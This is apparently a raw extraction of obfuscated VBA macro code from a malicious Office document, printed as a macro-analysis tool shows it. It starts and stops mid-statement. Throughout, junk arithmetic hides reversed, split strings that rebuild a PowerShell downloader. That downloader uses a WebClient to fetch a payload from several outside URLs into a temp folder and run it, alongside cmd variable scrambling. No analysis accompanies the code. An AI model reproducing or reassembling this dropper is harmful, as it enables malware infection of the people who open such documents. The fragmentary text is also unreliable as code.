CLng(LLBcC + CLng(34370)) + ZQQDYI + 79548 * huTNr - CStr(56538) / JLXLa / CLng(DPhzE)RwuFU = ZiEuUQnJbJb = (CRfIM / ZqiNu / 94799 / Fix(budJS)) + 36836 - CLng(UbopsP + CLng(85342)) + QsAkaX + 69385 * lohwu - CStr(93580) / RKwBpT / CLng(AJqcr)UMWrAHbUn = wQpJm("icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]c", 31058 + 2 - 31058, 31058 + 182 - 31058)dpQzOj = mNKWvrrVlUD = (fWfvN / YGsrt / 95438 / Fix(JZwXjj)) + 26507 - CLng(JEzaG + CLng(96275)) + SiYVYT + 89456 * KVjLI - CStr(36812) / WQZPhS / CLng(wBkqBW)fpApzI = kVYwUDhfMS = (MzGGK / bVBtd / 90430 / Fix(YYFGTa)) + 82260 - CLng(EwaNrZ + CLng(50460)) + aWLzXM + 68546 * jphWn - CStr(21360) / sdIwsw / CLng(LmbsHC)JHpwdEsFLpH = wQpJm("E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f", 35600 + 2 - 35600, 35600 + 193 - 35600)tThBtb = SvSMoXisUrt = (ijidh / zLYXfE / 63452 / Fix(pWAVuj)) + 40717 - CLng(iqjDRC + CLng(64318)) + GBOzwJ + 69832 * TQbLt - CStr(46314) / IHphHs / CLng(wKjHBs)vKXfT = FJmBoQDtHU = (imzjf / tdaLl / 86085 / Fix(zIotH)) + 20461 - CLng(HwXzn + CLng(70705)) + mGqrEF + 49019 * fELiUl - CStr(80369) / uXtbqH / CLng(KlwQvf)RanZst = wQpJm("Y0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2
", 87545 + 4 - 87545, 87545 + 178 - 87545)wvuWH = kThnAdkhcqS = (VccuI / fifGIp / 57680 / Fix(QGQjw)) + 58336 - CLng(taqFb + CLng(81010)) + sdIGzd + 19046 * VBlics - CStr(9263) / YwWhN / CLng(Rtsozb)khWJUo = FuuQhmrhLjj = (wzprC / jMDBs / 48721 / Fix(qHCChM)) + 97831 - CLng(RjzkT + CLng(28418)) + inaNL + 54509 * nriGSF - CStr(21325) / sBqBn / CLng(pfiWkN)PXzObwjG = wQpJm("PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+ml", 4687 + 2 - 4687, 4687 + 150 - 4687)QqHinj = PbfNDFKXaut = (PnztSb / sIwrb / 28122 / Fix(XAWYi)) + 46964 - CLng(mRWdwi + CLng(22082)) + HDcqNS + 54674 * OQMIkG - CStr(59984) / moBwJB / CLng(PVScW)azHoV = OTMGQZsWYY = (FwfKvY / iWMMjj / 93170 / Fix(zXkllo)) + 96039 - CLng(Yikkzf + CLng(4732)) + QlYuV + 87121 * EjBnt - CStr(3313) / dWUic / CLng(lnmwH)QLBqDsrNl = wQpJm("iEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEp", 52305 + 6 - 52305, 52305 + 94 - 52305)HbKnn = TtwzLPDHjB = (BEhREO / UDhhc / 99162 / Fix(mGlot)) + 92644 - CLng(kZIKj + CLng(20860)) + PYNFl + 2892 * ChqXwW - CStr(35941) / mMTzlP / CLng(STnFX)hPTKO = QXWjscCzfiTI = (cNzub / jMTTL / 69025 / Fix(fuRYTB)) + 14332 - CLng(Ydojj + CLng(22700)) + zjmrK + 81518 * USZjw - CStr(5058) / DDYIr / CLng(HiGKS)TFVVZwcU = wQpJm("bkR,mU9+mU9/mU9+mU9/:pttmU9+G.", 32819 + 3 - 32819, 32819 + 24 - 32819)zEjJN = EOPmjTuHZzw = (CEKUaP / prJOa / 53422 / Fix(JqTkJ)) + 22277 - CLng(tooRWF + CLng(66288)) + MijIaP + 92570 * jJtpEN - CStr(8895) / MEuQE / CLng(opnvJQ)ZzGUK = ZNoTjDUcwn = (TjbIYv / ziiWWz / 83355 / Fix(vliaMo)) + 46767 - CLng(KNoBUt + CLng(1306)) + itXCwu + 31946 * LmNfqr - CStr(32893) / oYHjw / CLng(asuJR)kQsGjzmtv = wQpJm("KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi", 41351 + 2 - 41351, 41351 + 135 - 41351)ktNDhI = dcozBUPZbsj = (wVMvl / 
bKSfH / 75799 / Fix(VpSZJz)) + 66513 - CLng(nrAbG + CLng(28220)) + IBRCZz + 96642 * jRRQj - CStr(54964) / zjKYz / CLng(zzRuA)JdMUf = iCROFcXalI = (hCbcuT / hPfLB / 99650 / Fix(YlplT)) + 94704 - CLng(Nwatja + CLng(92888)) + bnLrYN + 97374 * jjsDzn - CStr(4695) / POwpri / CLng(RKGTEA)kicwzQtiaMOhd = LtUlnsAJbuaw + """" + BatoavkicHEtz = jStulzziLzK = (FnEOtZ / rQRtIQ / 8880 / Fix(RNhuuH)) + 55493 - CLng(AfMKc + CLng(52475)) + cbluY + 65088 * sKTJC - CStr(30981) / AmVti / CLng(ViFQic)dowlFKYHb = DjhPLPFpRWW + zPHvPqrDOGFFzX + ItVWakEMIAt + sRCFDzprwV + kicwzQtiaMOhd + RusqwWVLvDTId + UKjPWqjNw + RanZst + PXzObwjG + ljaakrr + ZWhhiPzoP + EoHkR + tMMvPYQ + QLBqDsrNl + TFVVZwcU + LshKN + kQsGjzmtv + wdBSwU + JHpwdEsFLpH + cUuaIu + cwAkETD + ANzhp + wCffbz + aYofqzcWsE + UMWrAHbUn + ZiFiTzufS + dJWjrwmKKi = zNapzifiQV = (qpwQX / rvBKk / 9037 / Fix(MtWmS)) + 4350 - CLng(RisETD + CLng(81377)) + rphfhQ + 36310 * FhPvTn - CStr(26095) / cVPnOH / CLng(LNYmLz)End FunctionSub ClboX(GRFEQ)JHMYm = lOcjIocHjsC = (iiJIh / LqEdjv / 96136 / Fix(qpbDn)) + 19922 - CLng(MofSdj + CLng(99413)) + BZZCrl + 49039 * zfvbLj - CStr(70090) / oKuzmf / CLng(EsQSpi)DvLwDD = sGPRqYsjljE = (iTmBHV / UKbTjU / 19727 / Fix(APPcjp)) + 92803 - CLng(fjwDD + CLng(24235)) + fmlvK + 69235 * JohGm - CStr(65518) / whVRzs / CLng(WDXti)End Sub", File "HULSuHBvj.bas" (Streampath: "Macros/VBA/HULSuHBvj") has code: "Sub HqLkvVSjBLW()On Error Resume NextYzrqFa = aCOYjzlFUpIj = (CcUBp / PMijjP / 65929 / Fix(SGBNvI)) + 95544 - CLng(TrYUkj + CLng(77107)) + LnzlWW + 44716 * QzfNYh - CStr(79242) / RiTzT / CLng(NaPLIc)End SubFunction sRCFDzprwV()On Error Resume NextUtiYrV = RzaviLwcjSmC = (DFNoT / ZWVKNu / 22892 / Fix(DwphLs)) + 4421 - CLng(DXRHi + CLng(28463)) + ftWaYQ + 75812 * kXlWu - CStr(52937) / iozAu / CLng(ulaJCi)jwZiwN = SqdffKzRFfw = (KtUTf / zJjaiL / 2216 / Fix(twJJs)) + 23409 - CLng(iAhrf + CLng(38849)) + cRsvk + 38885 * pdFCz - CStr(27376) / iPzTi / CLng(RwIwnm)ZIZwH = wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198 + 4 
- 93198, 93198 + 17 - 93198)csnbA = khSiibDDVDGs = (zzliYB / zdJvIz / 27601 / Fix(zpiBXd)) + 54105 - CLng(jQrzY + CLng(25687)) + EpuoGc + 13193 * DzknD - CStr(18215) / aiSMGj / CLng(EVUXj)lWBNc = TOqzhjolOqKE = (HawjL / inabz / 91591 / Fix(LtbczA)) + 48825 - CLng(umErl + CLng(94178)) + mHzmw + 72278 * KYUBD - CStr(27408) / oPAlof / CLng(JmtKfQ)NUjTpWHKioO = wQpJm("HjwUfYsdMLdmXo%!!%Isoh8W", 9393 + 4 - 9393, 9393 + 18 - 9393)otoZc = ASdNzIjDHwwL = (GWEGz / GcVEb / 36104 / Fix(CVifb)) + 52842 - CLng(fVlmof + CLng(67651)) + GfwOU + 82745 * SpicK - CStr(44803) / zZlin / CLng(NYbUVa)EQucdi = nzaGpjKIHIk = (fPWlDb / aoRwjP / 55077 / Fix(viofrD)) + 16708 - CLng(KZfYUO + CLng(25932)) + XEGEp + 88013 * YBGPz - CStr(65056) / aZDiOi / CLng(dtfXa)EUrpOkhrC = wQpJm("MBDtes&&zsTahziwh48", 87114 + 4 - 87114, 87114 + 13 - 87114)MYDHM = GabIXrVPdko = (GizFU / zjsuLa / 64207 / Fix(hwzww)) + 5217 - CLng(bBwQf + CLng(74767)) + ICzIr + 27328 * dNSiR - CStr(24923) / OjQiqc / CLng(ZQill)jRccs = GTKaVuYuUfZ = (LiVib / Ujrjf / 73832 / Fix(czVhRR)) + 97653 - CLng(SMSOkZ + CLng(51563)) + czkrRX + 73552 * jAWYX - CStr(28775) / ioqGzC / CLng(DNaWt)fwLFvsQ = wQpJm("AKfYB%fXnREwX%!!%NoBBQA", 69883 + 5 - 69883, 69883 + 14 - 69883)CTrht = PkuuNLHzQv = (cDcoat / dbQwX / 33270 / Fix(iQLQJp)) + 58276 - CLng(zzktc + CLng(3728)) + vOmRzu + 78974 * OtzOQa - CStr(98110) / WdTavv / CLng(HFwHEd)hwEqq = BVijUhzTwZJ = (NcwWz / jQLBQ / 4531 / Fix(LAkvMQ)) + 97454 - CLng(fwwNtl + CLng(44327)) + TMGTP + 75605 * jZGkJC - CStr(81049) / RiaPh / CLng(YkIKr)RCSNH = wQpJm("I7 !%PInYdOqGm%!!F6.zww", 7908 + 7 - 7908, 7908 + 15 - 7908)dBJEUJ = roKiiZAVFj = (ipiiiS / pwvbz / 17770 / Fix(FwhPC)) + 30076 - CLng(vwfHv + CLng(93136)) + INCfcV + 24843 * zXalwT - CStr(19882) / MNZGSc / CLng(GCQoj)CktSz = irLZfNVWiKk = (FwhfOt / wPjANo / 75862 / Fix(bjnqCC)) + 36673 - CLng(wjCzap + CLng(59490)) + oJYvG + 40885 * iYPqO - CStr(15706) / Mqatu / CLng(vUhjlU)qcuLO = wQpJm("b.8Z59uesf7", 82066 + 3 - 82066, 82066 + 2 - 82066)wMvJHl = 
MDPsVbIRmM = (UnULX / uoYTbo / 18108 / Fix(mFRcGi)) + 56616 - CLng(wIbiXo + CLng(27393)) + CvXhzv + 58256 * YcMwr - CStr(87289) / bijTVq / CLng(jdbboM)Luckp = qswVbNMzWmjt = (WnQZin / itkaRp / 84679 / Fix(jHuvwf)) + 85586 - CLng(TcDjJR + CLng(24245)) + SbPsY + 56886 * GBIIw - CStr(26010) / JXuiQP / CLng(lwQdCw)UWifdl = wQpJm("it.wes&&w^o=pJz56", 69791 + 6 - 69791, 69791 + 8 - 69791)bDbQjN = qZzIDotoXt = (ZSfoi / zjhiz / 29167 / Fix(jGfzh)) + 83521 - CLng(AmTzv + CLng(41601)) + KCrIt + 69041 * XivPwP - CStr(68360) / aLajmW / CLng(JwHfcW)drUhiJ = HLpBpfXSnU = (hRpYBB / FIlzW / 14572 / Fix(pTiPO)) + 82205 - CLng(JYMGVW + CLng(72897)) + Nwpzc + 50123 * nSTfG - CStr(7769) / WOSuP / CLng(MpCZd)vldhdB = wQpJm("s6VTGHTG% tGqjH2LX", 74223 + 8 - 74223, 74223 + 9 - 74223)XtcRff = lumHXiUfPwjk = (EBwobG / HYvPV / 74024 / Fix(aKAoA)) + 38089 - CLng(KjGvP + CLng(30896)) + jZGqs + 19917 * ridDY - CStr(45464) / VrsBsz / CLng(UOHiQN)RpuUHE = XTcAHYzGlCJ = (oiMBX / EAtFdM / 68202 / Fix(nlkfhT)) + 14631 - CLng(VNRtGp + CLng(24241)) + Brkizj + 55294 * wWAwdO - CStr(98109) / YljMWF / CLng(qwwNz)fSJSUk = wQpJm("QPDR% tes&&JXzpEFJorrplRzo", 88291 + 6 - 88291, 88291 + 17 - 88291)idOnFD = bEpEIrLSLNGO = (VVJARv / ufBWd / 15268 / Fix(smIYK)) + 25631 - CLng(TwcDi + CLng(43726)) + XniGk + 13494 * IEnoI - CStr(28207) / ZnhfjQ / CLng(jCpwB)NmdmL = HtDoQjwSkUI = (dfavL / XEioEW / 49863 / Fix(TvdJk)) + 62608 - CLng(PlClo + CLng(55253)) + EiZJa + 6745 * omrRK - CStr(78165) / ZFzRqc / CLng(Dobjcv)BbKMcdWaK = wQpJm("JrwHsum%KGj", 34626 + 5 - 34626, 34626 + 5 - 34626)tXKXz = zAOuvkfIms = (rapjDT / AdBtwa / 96301 / Fix(FuPjt)) + 20364 - CLng(tZqFWU + CLng(83223)) + uBiIk + 39720 * MUrZz - CStr(68249) / GQUzOf / CLng(tGwPPj)ofOOCi = ozCKGVYszl = (UfqbZ / aVFinj / 88605 / Fix(jjrjuC)) + 34342 - CLng(jvwOEO + CLng(48952)) + dkSkFB + 96296 * oWbIz - CStr(12142) / VQQcm / CLng(JEjAtv)mViitpfTZhC = wQpJm("swJrwkwHsum%!!%FWraW1", 31541 + 4 - 31541, 31541 + 14 - 31541)iKnMwG = COJkinuYaJa = (lbwoln / UjjkM / 
12126 / Fix(ZijPM)) + 87179 - CLng(IHHjw + CLng(1578)) + OfIrSS + 18883 * MzaJn - CStr(70624) / fZXYi / CLng(QoLwh)lSXBiq = mAmbBIrqMrZC = (YKZjU / cECKSN / 70993 / Fix(WUHVW)) + 82531 - CLng(FXCwA + CLng(33539)) + zjCdd + 45861 * IzRJC - CStr(242) / wcJoXF / CLng(WFWCL)cNawKTwH = wQpJm("T2swdMLdmXo% 3pK", 53470 + 4 - 53470, 53470 + 9 - 53470)TnXnU = HGTIoNNOWpL = (qZHut / cLBbd / 61361 / Fix(RMtVai)) + 79689 - CLng(sbiTVE + CLng(20524)) + GzPKiV + 72516 * sifrJ - CStr(12826) / pcMRAU / CLng(vKWnwz)rOipTk = wEtQfJvfrMRt = (jSaVtm / CInzjm / 18940 / Fix(CZvXL)) + 68428 - CLng(PQSQA + CLng(8436)) + wKHnwL + 92763 * UZwzv - CStr(91944) / QvXcW / CLng(SRuhuM)JPimhzLJT = wQpJm("kOfWrnZBf% tes&&r^e=%Sf.W,", 55451 + 6 - 55451, 55451 + 18 - 55451)JCdli = KdsvqctFWYN = (XIAXtY / EjtMFB / 97923 / Fix(zRvMPa)) + 72253 - CLng(YAjitj + CLng(24221)) + VTGpuJ + 60194 * NAQdjf - CStr(80044) / zjunaM / CLng(NlfcWM)pZjXEv = oZbzwEiNOFF = (qjAwXc / hpfifE / 41965 / Fix(DwXbn)) + 58780 - CLng(jILhi + CLng(55001)) + AjCwU + 15086 * ZnzbO - CStr(9435) / tzRrii / CLng(PqiSIb)pBLVYEZbLId = wQpJm("Fq&ll=%PInYdOqGm% 57im", 88965 + 5 - 88965, 88965 + 16 - 88965)rkquE = pwbjkTdLYz = (ZQmLt / AwolsY / 62363 / Fix(jCiCI)) + 64219 - CLng(rJzVl + CLng(14274)) + KBESf + 88885 * KQjqBt - CStr(11119) / DDDzY / CLng(RvIPSN)iRHXma = MztiXBjUMVU = (CmDiI / uViTW / 9784 / Fix(hUdPw)) + 24211 - CLng(iVlfz + CLng(65329)) + QirQRE + 32509 * vOdPSj - CStr(83470) / fWdBEh / CLng(ENICn)wBQQMR = wQpJm("wQd%!=%FvIs0ZC", 65583 + 7 - 65583, 65583 + 6 - 65583)BYjadd = rCEAEBPljtm = (qGIUfl / bmDJCd / 95296 / Fix(qwppCz)) + 76068 - CLng(SczCIn + CLng(36847)) + OPwquP + 22515 * rtQEzv - CStr(95853) / EiZotE / CLng(rDdqri)ZAzPa = CFwSPFzXVBz = (QDViwz / ORjzYw / 96172 / Fix(njzLNC)) + 64916 - CLng(bASwK + CLng(73067)) + VFzQF + 31199 * WDRoX - CStr(72773) / wuRHN / CLng(nYqjj)iZKSpWMfDs = wQpJm("vv0vssBOtes&&!J", 67697 + 2 - 67697, 67697 + 6 - 67697)CtidBb = wOtYhsjNttZi = (fdFBoz / iwPPhW / 26837 / Fix(saQNv)) + 
74958 - CLng(EVjOk + CLng(51242)) + fwJEmW + 31485 * cMdAU - CStr(34691) / JzVOZV / CLng(dMjIY)wWDru = hnPtSGazQvN = (OficXh / Lsnuk / 26159 / Fix(ZscvN)) + 7703 - CLng(aSdJLJ + CLng(20570)) + vmszNz + 52969 * ujJlJ - CStr(77249) / UIFKj / CLng(XVhJHn)fPRtRoqA = wQpJm("5XcR=%RsCOuwtHJRpYL% 3a", 47362 + 3 - 47362, 47362 + 17 - 47362)ATMYw = zABlzwYiPE = (imSJB / wiIYR / 20527 / Fix(FLOTbT)) + 70675 - CLng(pqzSXF + CLng(81209)) + KpFdrd + 2697 * rRGZTL - CStr(48856) / rvtJjE / CLng(vTiov)zRarRf = hjckcAiaYmm = (pXTpX / KivVBb / 49994 / Fix(MtDKw)) + 42701 - CLng(tPQPYW + CLng(67620)) + dUojs + 9203 * wlUfUO - CStr(74782) / aICmp / CLng(XNpQTv)HGiADLNKKN = wQpJm("Z18aIlstes&&eh=%fXnREwXL,", 36115 + 3 - 36115, 36115 + 16 - 36115)CZwPb = RANshluSqR = (hGBqH / ktXGG / 98138 / Fix(YISvL)) + 43264 - CLng(ssVMN + CLng(31113)) + cDqEX + 46206 * mpFLS - CStr(52878) / izLuOZ / CLng(ATzGT)RbAHL = nuiclIHBcuD = (hqodGf / ViQKNv / 5468 / Fix(hUaOTi)) + 7583 - CLng(aMSAvr + CLng(75075)) + AwqoZc + 96259 * cbzEiT - CStr(28733) / cIZhBj / CLng(wdEOQn)iPFGnYsGFvi = wQpJm("lDlPGtes&&GwBRPlJz=%mKF", 1883 + 3 - 1883, 1883 + 15 - 1883)nivcJP = OZEWjsizGGz = (XnRFlU / tKUOh / 12739 / Fix(oVJBKz)) + 72445 - CLng(jUKVu + CLng(84053)) + izHSL + 15482 * MpqpA - CStr(20418) / EqoZp / CLng(JpFww)tzRDXI = zjUGzzWGvv = (hCpdF / YGwLX / 60147 / Fix(PdYbC)) + 32824 - CLng(JYhLb + CLng(35979)) + UvCcJY + 54552 * tETLs - CStr(97126) / UlLpj / CLng(sYvEij)YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392 + 5 - 81392, 81392 + 13 - 81392)JVdCm = EKviNuMkUH = (YMHEvA / jKbXHX / 60480 / Fix(WtYaRY)) + 50986 - CLng(rYDwio + CLng(40718)) + DnOFX + 96340 * ZdQDH - CStr(54232) / oKiRYS / CLng(tqRzS)MBJkOr = RQYjNBdEVc = (pbiimJ / pqmJNu / 51480 / Fix(jcrbi)) + 17606 - CLng(TNOmwQ + CLng(20585)) + JVoljL + 64293 * WbPBQ - CStr(61192) / LomER / CLng(MttXK)upLfisAzi = wQpJm("spnZBf%!!%RsCOukici", 31841 + 5 - 31841, 31841 + 13 - 31841)RQAMi = CdnZJuCFVATH = (nFCzK / sowcu / 27814 / Fix(DQHVO)) + 64001 - CLng(NCUmf + 
CLng(85231)) + Pursa + 30488 * ULNDCW - CStr(72418) / jKiuX / CLng(mwzmlk)iwpYVv = MfNjtTpFnzHY = (zfcPD / HzznV / 42417 / Fix(tLrZE)) + 8773 - CLng(zzRmo + CLng(63813)) + HcmqVG + 53514 * RMISsl - CStr(24831) / aKWzDd / CLng(OsDVR)QMWPujSG = wQpJm("B2UMNJ=%VHTUTCEY0Cd.", 1890 + 7 - 1890, 1890 + 11 - 1890)OqaWVA = NwAPuufQmL = (mRqbR / ddOYzR / 71700 / Fix(lCViv)) + 43927 - CLng(pSiKHC + CLng(91457)) + iwGrCf + 64559 * OJmsW - CStr(16171) / ziikWr / CLng(iqphw)YETmF = WTjMHWGjrDT = (fHSpB / UGhkj / 20486 / Fix(vslbqf)) + 18670 - CLng(KWzDB + CLng(45139)) + CrjIbJ + 73123 * FPRMk - CStr(13772) / jzBLjd / CLng(HBXKF)NcBwhXWKd = wQpJm("YZ&p=%TjDEXVkGksKp% tps2SA", 98373 + 6 - 98373, 98373 + 19 - 98373)lSmAC = EqEajmqfMYT = (AUnCB / oHhjfl / 33480 / Fix(QQmcR)) + 19048 - CLng(DwiWS + CLng(47903)) + mpvcE + 71585 * AwQkL - CStr(27734) / WGZpRi / CLng(asjHJX)SAZjXP = DDaTSPpAnkS = (Twkqn / Sptjj / 2807 / Fix(SfQETc)) + 37751 - CLng(iETIP + CLng(11638)) + DjoCX + 82100 * UPivBw - CStr(34902) / XrSbN / CLng(YwTHwB)tsUDDJi = wQpJm("wFc.l&%", 95443 + 2 - 95443, 95443 + 1 - 95443)tRhYQQ = JrhdAqBVYaX = (Uhcqo / SfnVuY / 78311 / Fix(bwBXkj)) + 62328 - CLng(fKobW + CLng(51035)) + avjbB + 39099 * orkXz - CStr(11671) / WmELD / CLng(DUAqrT)dVLzcr = ZavjNbJPbXbz = (IASBu / RLFpz / 34269 / Fix(QUivoE)) + 37036 - CLng(OLwJkR + CLng(17686)) + MzoLVU + 39617 * wiYRNU - CStr(13065) / vvXphj / CLng(WjjtpT)DSGIPrKNWlU = wQpJm("BSvYhmXnjzGDhFf% te,wdP", 39062 + 5 - 39062, 39062 + 17 - 39062)JBHVtr = GKvzoFfBMtE = (NptTJ / OSfpbf / 49509 / Fix(ZWJsb)) + 29002 - CLng(plcps + CLng(68137)) + qiTAkE + 57267 * IoLNd - CStr(83262) / UUUPpj / CLng(rUSpq)SNvjhV = SMiqFwhzGNEV = (bAYlp / YJAGLp / 39266 / Fix(vOEVS)) + 13845 - CLng(KOKCaL + CLng(78721)) + jjowa + 82089 * WzsjO - CStr(17673) / XiPcI / CLng(lBslOT)NhiDbVW = wQpJm("iQwRHh=%zNafst", 46084 + 5 - 46084, 46084 + 7 - 46084)mNjOa = wUXWttirGdjs = (zrjmwD / birDh / 14930 / Fix(aIOdJ)) + 60421 - CLng(rzIWi + CLng(59217)) + tvOCW + 65254 * uhzQW 
- CStr(62586) / pjSMl / CLng(HisAZ)MnREwP = JliTCboucEd = (ciAiQY / rwvzzr / 85060 / Fix(zzdIJJ)) + 92620 - CLng(TjUFmk + CLng(14670)) + uzoGdn + 74104 * YZjKpj - CStr(39902) / jBpzz / CLng(UTjChv)zqmAkSWEVfF = wQpJm("4fiIIsowkw9zu", 25393 + 5 - 25393, 25393 + 5 - 25393)TCHqHD = ClzMKpjclqmO = (WluKp / iVabFr / 85952 / Fix(WYTid)) + 40200 - CLng(zEdmK + CLng(20141)) + quLvjl + 93929 * MjREU - CStr(64836) / VGTwf / CLng(DRHJt)JbaKY = QvwMBLnkzFV = (DLauX / TnlZBM / 51795 / Fix(CbXVt)) + 87424 - CLng(GvEzW + CLng(56438)) + vlRXI + 6315 * MihCX - CStr(7828) / iVwza / CLng(IMNiM)mOLCQVHchW = wQpJm("miYJYs&&!%TjDEXVkGksKp%!4iJh", 1562 + 5 - 1562, 1562 + 19 - 1562)EzPVuA = JrAIiXwqsp = (Vpjba / zwDBj / 46627 / Fix(KjwYwM)) + 75198 - CLng(PudiN + CLng(36117)) + DaSUXL + 82395 * XWpNuE - CStr(9529) / IbUTX / CLng(atfCR)bBAvjc = HKXnjnIiLzzO = (uIPas / IHJlOt / 10630 / Fix(SpjiA)) + 48004 - CLng(WLvSS + CLng(94703)) + rpmjz + 18177 * slVnhc - CStr(93) / mZphN / CLng(tbOzpz)uznHTbW = wQpJm("iHbjvnmRsnurupvH% tQRZl", 12488 + 5 - 12488, 12488 + 17 - 12488)wTHZw = PTwftwZEOuSw = (VZVdk / izOYkK / 20024 / Fix(wROOj)) + 78837 - CLng(hnuvlc + CLng(32346)) + NUjsfD + 43962 * ipOISF - CStr(50383) / jlcdmz / CLng(jHjnlb)dkkwjh = iDNvcAUHSGj = (XjPVbX / pLpjS / 49926 / Fix(dqTnj)) + 50826 - CLng(EmbBK + CLng(84180)) + RzDlZ + 16899 * wUPXI - CStr(61279) / SNjdC / CLng(XdnfXI)JcSJhokzZTa = wQpJm("WUwtHJRpYL%!&,0@Fwr", 63604 + 7 - 63604, 63604 + 11 - 63604)TtoTQ = oYMlvskjVEQ = (uAmZuY / FpnLY / 27274 / Fix(sCCjv)) + 11639 - CLng(rwFblk + CLng(71800)) + qIjPw + 27579 * jUtvI - CStr(50555) / lBNhcY / CLng(ioIKzD)iJohQ = RRRrESYljb = (mOvZAz / irjzQB / 28827 / Fix(ozbPw)) + 87607 - CLng(UtiMOr + CLng(98855)) + aVQkud + 17490 * IrwmP - CStr(64258) / Aqpjd / CLng(KRdhJt)rqYwX = wQpJm("Vi7LLkVNwWksWbmhl% t7w", 8268 + 3 - 8268, 8268 + 15 - 8268)qnjri = JizQUqsSXzHN = (bhVZKV / PDnCk / 68030 / Fix(OVIHH)) + 37582 - CLng(nBaUq + CLng(96340)) + rtdawG + 52135 * RKhJb - CStr(87611) / MNkGYd / 
CLng(PsztPn)GjhANT = BGLkmjmKsmdk = (rAuNX / nzchF / 17478 / Fix(dRzdSF)) + 50094 - CLng(fhtuJh + CLng(50704)) + QIIpcO + 61350 * npMnBi - CStr(56547) / dBAVNP / CLng(YKaLS)jHvjjvwYR = wQpJm("wSDqYpBsz", 63022 + 5 - 63022, 63022 + 3 - 63022)SOZMI = ZwTFPJpdsmi = (EORIh / dBoki / 3623 / Fix(MmUan)) + 50711 - CLng(SDjJvk + CLng(67199)) + ZqjYs + 18958 * nBFrH - CStr(58185) / lLpDM / CLng(XVCFM)hLafP = wDiICHSizhA = (ZVYJJ / iooBrj / 53496 / Fix(IMNAB)) + 85652 - CLng(VVdmW + CLng(3743)) + cbSBq + 35896 * fICRB - CStr(69862) / JBrbaC / CLng(GQzfH)aVjIS = wQpJm("kso=%pzUCKIcbi", 78185 + 7 - 78185, 78185 + 6 - 78185)DzuXn = TMNjppCcDLj = (ICMTmK / zCVKTV / 66897 / Fix(zjOid)) + 49179 - CLng(lwSBl + CLng(33299)) + hDFQjz + 8029 * jHNrcQ - CStr(81353) / PUHzD / CLng(ojFaqQ)CGiBof = scSSGRuDYLT = (UuzVP / wmuIkz / 46674 / Fix(CnfCv)) + 48060 - CLng(AHHCZ + CLng(75156)) + iVwuE + 62523 * HIJmM - CStr(63123) / zUhUi / CLng(OGXWP)wVurLGdno = wQpJm("r11%bHYKFlwod% tesXYf%5", 29395 + 6 - 29395, 29395 + 15 - 29395)sTmqSp = fDYLqskufVQi = (BCnahq / EczZi / 20271 / Fix(CVSqwX)) + 1829 - CLng(ZIqbq + CLng(78991)) + bBGhB + 82524 * zPlzb - CStr(53568) / amMiDi / CLng(MiTKr)JqFzPI = UKNaSnDnFmpb = (BEmwZ / lVKEr / 85367 / Fix(HwjbQR)) + 9873 - CLng(mmwHJ + CLng(11805)) + fORYrP + 15860 * SzpmHw - CStr(98279) / iaIiE / CLng(iVYWz)wlDJD = wQpJm("6Kt%bHYKFlwokA4", 64962 + 4 - 64962, 64962 + 9 - 64962)SqqQP = qwmTAzMOcb = (zVndNh / bZXjw / 677 / Fix(RtTbI)) + 49126 - CLng(AHCWP + CLng(50178)) + istCus + 48447 * bpdJOo - CStr(65023) / MqSfw / CLng(smTBI)sRCFDzprwV = qcuLO + uznHTbW + iPFGnYsGFvi + NcBwhXWKd + tsUDDJi + wVurLGdno + UWifdl + vldhdB + jHvjjvwYR + QMWPujSG + EUrpOkhrC + fPRtRoqA + mOLCQVHchW + DSGIPrKNWlU + NhiDbVW + fSJSUk + BbKMcdWaK + zqmAkSWEVfF + JPimhzLJT + wBQQMR + wlDJD + iZKSpWMfDs + cNawKTwH + YAzLJjzu + rqYwX + aVjIS + ZIZwH + HGiADLNKKN + pBLVYEZbLId + JcSJhokzZTa + upLfisAzi + mViitpfTZhC + NUjTpWHKioO + fwLFvsQ + RCSNHOkGzHI = hihCHwRiwzKi = (opjzu / YzGisk / 
